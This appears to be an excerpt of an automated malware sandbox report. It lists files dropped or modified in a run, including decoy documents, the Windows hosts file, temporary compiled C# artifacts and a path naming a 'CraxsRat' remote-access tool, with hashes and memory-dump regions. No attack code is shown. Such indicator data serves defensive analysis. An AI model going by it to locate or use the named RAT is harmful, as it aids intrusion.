SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\TestWatch.jpgFilesize
286KB
MD55f6af7531c5d09b3f3cadff952605bfa
SHA11c48e52e0230803dca3e36bf7e700146cda2c9fc
SHA25686027d6a83e528803014e9498f6a5c74194292260e5314dcfe8c81ac6b106cd1
SHA51247681038341fafbc6da6e90469f754f24966daf03ecd28a6096f16b70c5810772aea8bdce70afb3a6084a8f23f8eeeef0905227fcf9670a12fc45cc1202d8fff
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docxFilesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\BackupCopy.vssxFilesize
701KB
MD5ab32cd487c6969e4eff644f43f73b6e6
SHA19f48ca4ade620ed338fda113fb10f4df8c128bb2
SHA25689be3695883f59cf86ca9662b0242d2d96caaf7aa8717105f9fd39fd98a19fbd
SHA512688a7d0d67e432ba90dacec001afb452b9837926ec78cb6a65898876bd71d46c3a61cbc833e0fc171e865e2b54f8d2b5d58d1f5243eda322b1d1f30365424cac
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docxFilesize
11KB
MD54a8fbd593a733fc669169d614021185b
SHA1166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA5126b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\FormatSubmit.txtFilesize
892KB
MD540959297232edcf64958ebbdd6e08193
SHA1e3dbf275161688e3b5637b3acf0f216fbf76aff7
SHA2563db013090e58668301fdf4cc02df53bb9387a49171abb40224ba4b53bdeb66c6
SHA512e8a864468623b13ab9bf9b5d18bbec33c77b67614e298b0dcea661910919f50369c584bbad7c6c8ec1ab3d577641ca3b4e4c553312807d997e8569a9640df7d8
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\NewBackup.potFilesize
510KB
MD52ed51e44c19132ff764f9220c68e7508
SHA10562015951af1a68518b992b75b354cd8d001978
SHA256c5c8ca6806d57a9650f3e365f365b9ee8bbd665f9e3c5451a592016e79b709b5
SHA5121448b52aa4356640c59a38069339a225b95b3423a28d012b833765c2593a4e014bb2d199c4636aace42cc3d5ac26d5097202cc66652a132b8e0e4aa7966ac07e
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docxFilesize
11KB
MD5bfbc1a403197ac8cfc95638c2da2cf0e
SHA1634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\PopSelect.xlsxFilesize
616KB
MD52f6ab263bb3028ee49ea9d3453906444
SHA1494d035929836bcdafa4d61a43d65fbb8cafff51
SHA25657576415cf72174f0d0d29974d9a8e991b524baaf41c0cefdfe3763c4dc6f344
SHA5122ac38d91c99c193240651d46704a74160dcd16ae51e139d5c6f5c5419a07d811c43901e8265e0752ac4a67db010da331f5c1ae49a61c14d14c0f2917c852dbdd
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docxFilesize
11KB
MD53b068f508d40eb8258ff0b0592ca1f9c
SHA159ac025c3256e9c6c86165082974fe791ff9833a
SHA25607db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SendBlock.csvFilesize
1.0MB
MD5adad34f0d1b8334280c991446403ad28
SHA17f0e415e01eed5f81be7081b665c4c3d96c47bb4
SHA2562549b1f8ffa421b4b6c9942a966d5c7510a7069c665c9e171b1a94dbeb88079a
SHA5127c742ca9e2359f8159ee4b1b86fc192d682247bec5764ff07e798c4dd9bbf5e61c67d2a3644c861d4a450e6c8f615047a391e9f6665f455efa3c182f415f55d6
-
C:\Users\Admin\Desktop\CraxsRat V6.7\CraxsRat VIP\ID.txtFilesize
38B
MD50c3c0008268c53113dec36791aa28e4e
SHA169e7eb04539fd562a73d22897e2af096dc0192fb
SHA2567c89b928aff5c3e9f969ef47cb5f59e0cbaac6e4fc20b3ee637a88e8a74ad3b9
SHA512693497c420eb04d528ad9786e4d6e0ab76ca00f05669ee559c42a8ec760bdb46551db4cb005c4748055d0980266bc45ad092cbb627b77f7165a6af05dff2db44
-
C:\Windows\System32\drivers\etc\hostsFilesize
2KB
MD5f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6
-
\??\c:\Users\Admin\AppData\Local\Temp\2prs3qo5\2prs3qo5.0.csFilesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
\??\c:\Users\Admin\AppData\Local\Temp\2prs3qo5\2prs3qo5.cmdlineFilesize
607B
MD5456c25a9a3005f69e6e43b639117929a
SHA14f314b5f168efffe64eaf6e26aace7d2afdd0416
SHA2568dd92ce4cd33dd5e80210b6d0e14e4263edba6cca46b996964ca1422733e08c6
SHA51215b499b13ee51eff702da71e7b8c13df9a7801d984d8df24554a09e1f2740c55bdbaf20ed95f9774aba3f3381ad7aacd18f91f671b96d39424754827e599bdfa
-
\??\c:\Users\Admin\AppData\Local\Temp\2prs3qo5\CSCD83911F452EF40B6A2A1FCF734954FE.TMPFilesize
652B
MD5922822f47978a095a90bc4c60e9c66da
SHA1b4c005bfaec615c090f9c2b372cb423317856d7e
SHA25613e6df837b7f89e4995f7e6a2775cdceacffc7c6e0ac9949f262eb8c15b28df9
SHA5124d9bc89db2966e53347127b2d8ab65444c6a1751d493c5c3a544fd2186fbeef6646eda503e7ef877f64b35216eae684132192a8fc8c3350b933f94ea62d4e0af
-
memory/928-1098-0x000002AA714F0000-0x000002AA71512000-memory.dmpFilesize
136KB
-
memory/1888-1216-0x00000120F4F20000-0x00000120F4F28000-memory.dmpFilesize
32KB
-
memory/3156-1074-0x00007FFA5A620000-0x00007FFA5A64C000-memory.dmpFilesize
176KB
-
memory/3156-1319-0x00007FFA49AF0000-0x00007FFA49F56000-memory.dmpFilesize
4.4MB
-
memory/3156-1093-0x00007FFA50DA0000-0x00007FFA50DB5000-memory.dmpFilesize
84KB
-
memory/3156-1094-0x00007FFA5E940000-0x00007FFA5E94D000-memory.dmpFilesize
52KB
-
memory/3156-1090-0x00007FFA4FAE0000-0x00007FFA4FB98000-memory.dmpFilesize
736KB
-
memory/3156-1279-0x00007FFA49AF0000-0x00007FFA49F56000-memory.dmpFilesize
4.4MB
-
memory/3156-1089-0x00007FFA48920000-0x00007FFA48C99000-memory.dmpFilesize
3.5MB
-
memory/3156-1088-0x00007FFA570B0000-0x00007FFA570DE000-memory.dmpFilesize
184KB
-
memory/3156-1084-0x00007FFA635C0000-0x00007FFA635CD000-memory.dmpFilesize
52KB
-
memory/3156-1082-0x00007FFA596B0000-0x00007FFA596C9000-memory.dmpFilesize
100KB
-
memory/3156-1078-0x00007FFA5AA20000-0x00007FFA5AA38000-memory.dmpFilesize
96KB
-
memory/3156-1080-0x00007FFA55E30000-0x00007FFA55FAA000-memory.dmpFilesize
1.5MB
-
memory/3156-1079-0x00007FFA5A440000-0x00007FFA5A45F000-memory.dmpFilesize
124KB
-
memory/3156-1050-0x00007FFA5AD90000-0x00007FFA5ADB4000-memory.dmpFilesize
144KB
-
memory/3156-1052-0x00007FFA635D0000-0x00007FFA635DF000-memory.dmpFilesize
60KB
-
memory/3156-1045-0x00007FFA49AF0000-0x00007FFA49F56000-memory.dmpFilesize
4.4MB
-
memory/3156-1505-0x00007FFA5AD90000-0x00007FFA5ADB4000-memory.dmpFilesize
144KB
-
memory/3156-1506-0x00007FFA635D0000-0x00007FFA635DF000-memory.dmpFilesize
60KB
-
memory/3156-1306-0x00007FFA5AD90000-0x00007FFA5ADB4000-memory.dmpFilesize
144KB
-
memory/3156-1507-0x00007FFA5A620000-0x00007FFA5A64C000-memory.dmpFilesize
176KB
-
memory/3156-1333-0x00007FFA42FC0000-0x00007FFA430D8000-memory.dmpFilesize
1.1MB
-
memory/3156-1334-0x00007FFA635D0000-0x00007FFA635DF000-memory.dmpFilesize
60KB
-
memory/3156-1329-0x00007FFA48920000-0x00007FFA48C99000-memory.dmpFilesize
3.5MB
-
memory/3156-1330-0x00007FFA4FAE0000-0x00007FFA4FB98000-memory.dmpFilesize
736KB
-
memory/3156-1328-0x00007FFA570B0000-0x00007FFA570DE000-memory.dmpFilesize
184KB
-
memory/3156-1325-0x00007FFA55E30000-0x00007FFA55FAA000-memory.dmpFilesize
1.5MB
-
memory/3156-1324-0x00007FFA5A440000-0x00007FFA5A45F000-memory.dmpFilesize
124KB
-
memory/3156-1107-0x00007FFA42FC0000-0x00007FFA430D8000-memory.dmpFilesize
1.1MB
-
memory/3156-1326-0x00007FFA596B0000-0x00007FFA596C9000-memory.dmpFilesize
100KB
-
memory/3156-1508-0x00007FFA5AA20000-0x00007FFA5AA38000-memory.dmpFilesize
96KB
-
memory/3156-1510-0x00007FFA55E30000-0x00007FFA55FAA000-memory.dmpFilesize
1.5MB
-
memory/3156-1511-0x00007FFA596B0000-0x00007FFA596C9000-memory.dmpFilesize
100KB
-
memory/3156-1512-0x00007FFA635C0000-0x00007FFA635CD000-memory.dmpFilesize
52KB
-
memory/3156-1514-0x00007FFA48920000-0x00007FFA48C99000-memory.dmpFilesize
3.5MB
-
memory/3156-1515-0x00007FFA4FAE0000-0x00007FFA4FB98000-memory.dmpFilesize
736KB
-
memory/3156-1516-0x00007FFA50DA0000-0x00007FFA50DB5000-memory.dmpFilesize
84KB
-
memory/3156-1517-0x00007FFA5E940000-0x00007FFA5E94D000-memory.dmpFilesize
52KB
-
memory/3156-1518-0x00007FFA42FC0000-0x00007FFA430D8000-memory.dmpFilesize
1.1MB
-
memory/3156-1513-0x00007FFA570B0000-0x00007FFA570DE000-memory.dmpFilesize
184KB
-
memory/3156-1509-0x00007FFA5A440000-0x00007FFA5A45F000-memory.dmpFilesize
124KB
-
memory/3156-1504-0x00007FFA49AF0000-0x00007FFA49F56000-memory.dmpFilesize
4.4MB
-
memory/3264-1342-0x000002CBE6580000-0x000002CBE6726000-memory.dmpFilesize
1.6MB
-
memory/3264-1339-0x000002CBB0080000-0x000002CBB00AC000-memory.dmpFilesize
176KB
-
memory/3264-1391-0x000002CBD6720000-0x000002CBD67D2000-memory.dmpFilesize
712KB
-
memory/3264-1375-0x00007FFA46530000-0x00007FFA4667F000-memory.dmpFilesize
1.3MB
-
memory/3264-1359-0x00007FFA46530000-0x00007FFA4667F000-memory.dmpFilesize
1.3MB
-
memory/3264-1343-0x000002CBF0D30000-0x000002CBF0D66000-memory.dmpFilesize
216KB
-
memory/3264-1392-0x000002CBD7330000-0x000002CBD7858000-memory.dmpFilesize
5.2MB
-
memory/3264-1341-0x00007FFA46530000-0x00007FFA4667F000-memory.dmpFilesize
1.3MB
-
memory/3264-1393-0x00007FFA46530000-0x00007FFA4667F000-memory.dmpFilesize
1.3MB
-
memory/3264-1340-0x000002CBB00F0000-0x000002CBB012C000-memory.dmpFilesize
240KB
-
memory/3264-1338-0x000002CBB0060000-0x000002CBB007C000-memory.dmpFilesize
112KB
-
memory/3264-1337-0x000002CBAE8F0000-0x000002CBAE8FC000-memory.dmpFilesize
48KB
-
memory/3264-1316-0x000002CBD9280000-0x000002CBDCFE2000-memory.dmpFilesize
61.4MB
-
memory/3264-1296-0x000002CBC8950000-0x000002CBC8A88000-memory.dmpFilesize
1.2MB
-
memory/3264-1294-0x000002CBAAB60000-0x000002CBAE2AC000-memory.dmpFilesize
55.3MB